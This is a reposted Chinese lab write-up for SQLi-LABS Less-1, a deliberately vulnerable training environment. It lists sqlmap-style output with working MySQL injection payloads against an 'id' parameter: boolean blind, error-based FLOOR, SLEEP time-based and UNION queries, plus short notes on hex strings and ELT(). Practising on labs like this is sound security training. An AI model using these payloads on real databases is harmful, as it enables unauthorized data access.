SQLi-LABS Page-1(Basic Challenges)
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了SQLi-LABS Page-1(Basic Challenges),小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含1346字,纯文字阅读大概需要2分钟。
内容图文
一、Less-1 GET - Error based - Single quotes - String
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1‘ AND 4178=4178 AND ‘rrHN‘=‘rrHN
---
---
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1‘ AND (SELECT 1743 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (ELT(1743=1743,1))),0x717a7a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ‘krWb‘=‘krWb
---
---
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1‘ AND SLEEP(5) AND ‘emVc‘=‘emVc
---
休眠了好5秒
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-6174‘ UNION ALL SELECT NULL,CONCAT(0x717a707871,0x6b48684e74754d58786858774d445666764c516d4654634244476d78426643464f57596f71587a73,0x717a7a7071),NULL-- vXnD
---
mysql 操作16进制:
mysql ELT()函数:
ELT(N,str1,str2,str3,...)
如果N= 1,返回str1,如果N= 2,返回str2,等等。如果N小于1或大于参数个数,返回NULL。
SQLi-LABS Page-1(Basic Challenges)
标签:col ase sed order type rom schema 分享 alt
本文系统来源:http://www.cnblogs.com/natian-ws/p/7868696.html
内容总结
以上是互联网集市为您收集整理的SQLi-LABS Page-1(Basic Challenges)全部内容,希望文章能够帮你解决SQLi-LABS Page-1(Basic Challenges)所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。